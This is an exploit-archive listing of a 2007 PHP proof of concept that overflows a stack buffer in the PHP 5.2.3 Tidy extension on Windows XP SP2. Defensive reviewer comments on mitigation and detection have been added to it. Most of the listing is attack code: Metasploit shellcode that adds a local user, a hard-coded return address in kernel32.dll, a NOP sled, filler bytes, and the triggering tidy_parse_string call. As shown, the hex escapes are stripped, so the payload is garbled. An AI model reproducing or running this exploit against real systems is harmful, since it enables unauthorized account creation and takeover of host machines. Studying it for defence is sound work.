# Title : PHP 5.2.3 Tidy extension Local Buffer Overflow Exploit
# Published : 2007-06-19
# Author : rgod
# Previous Title : Linux Kernel < 2.6.20.2 IPV6_Getsockopt_Sticky Memory Leak PoC
# Next Title : DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit
<?php
//PHP 5.2.3 tidy_parse_string() & tidy_repair_string() local
//buffer overflow poc (win)
//rgod
//site: retrogod.altervista.org
//quickly tested on xp sp2, worked both from the cli and on apache
//let's have a look here: http://www.google.com/codesearch?hl=it&q=+tidy_parse_string&sa=N
//
// Reviewer notes (defensive reading of this listing):
// - The overflow is reached through the tidy extension itself, so the
//   only precondition the script checks is that the extension is loaded.
//   Hosts that do not need Tidy should not load it; where it is needed,
//   tidy_parse_string/tidy_repair_string can be listed in php.ini
//   `disable_functions` for code paths that never call them.
// - Fix: upgrade PHP to a release later than 5.2.3 (the tidy fix landed in
//   a subsequent 5.2.x release -- TODO confirm the exact version against
//   the PHP changelog before relying on it).
// - The payload relies on returning into the stack, so hardware DEP/NX on
//   the PHP process blocks execution even where the overwrite succeeds;
//   the fixed kernel32.dll address in $EIP also assumes no ASLR (XP SP2).
// - As extracted here the hex escape prefixes in every string literal are
//   missing, so the literals below are plain ASCII text, not byte payloads.
if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");}
# win32_adduser - PASS=tzu EXITFUNC=thread USER=sun Size=233 Encoder=JmpCallAdditive http://metasploit.com
// Metasploit-generated payload (adds a local user, per the header above);
// its contents are opaque from this listing -- treat any occurrence of
// this string in deployed PHP code as an indicator worth investigating.
$scode =
"xfcxbbx0bxadx7dx9axebx0cx5ex56x31x1exadx01xc3x85".
"xc0x75xf7xc3xe8xefxffxffxffxf7x45x39x9ax07x96x49".
"xdfx3bx1dx31xe5x3bx20x25x6exf4x3ax32x2ex2ax3axaf".
"x98xa1x08xa4x1ax5bx41x7ax85x0fx26xbaxc2x48xe6xf1".
"x26x57x2axeexcdx6cxfexd5x29xe7x1bx9ex6dx23xe5x4a".
"xf7xa0xe9xc7x73xe9xedxd6x68x9ex12x52x6fx4bxa3x38".
"x54x8fx77xf1x54xebxfcxb2x64x76xc2x4bx89xf3x83xa7".
"x1ax73x18x15x97x1bx28x8exa1x50xa8xe0xb2x66xa9x8b".
"xdbx5axf6xbaxedxc2x5ex34xe9x81x9fx3dx5axedxf0x0c".
"xbax8dx66x09xc5xc7x79x7exc5x30xe6xedx5dx90x8cx95".
"xf8xccx61x05x23x62x1bxbdx03x0fx90x58x36xcfx25xd6".
"xd8x2fxbex62x50x0fx11xd2xdex0bx4dxf2xf8xb3xe3x9f".
"x70x93x97x30x1axb2x0bxa8xaex5bxa1x46x6fxe2x2dxca".
"x06x8axc4x67xadx20x76xfcx22xb6x0bxdcxcfx43x82x3c".
"x1fxeax1ex79x5fxecx9ex81x5f";
// Saved return address overwrite: a fixed address inside kernel32.dll,
// which is why the PoC is tied to one unpatched XP SP2 build.
$EIP="x8Bx51x81x7C"; //0x7C81518B call esp kernel32.dll
$NOP=str_repeat("x90",12);
// 2036 filler bytes before the return-address slot: that offset is the
// size of the vulnerable stack buffer plus whatever lies between it and
// the saved return address -- an empirical value from the author, not
// derivable from this listing.
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode;
// The oversized buffer is passed as the SECOND argument (the config
// string), not as the document to parse; the input document is just "1".
// Detection hint: tidy_* calls whose config/options argument is built from
// str_repeat() or is kilobytes long are abnormal and worth flagging.
tidy_parse_string(1,$____buff,1);
?>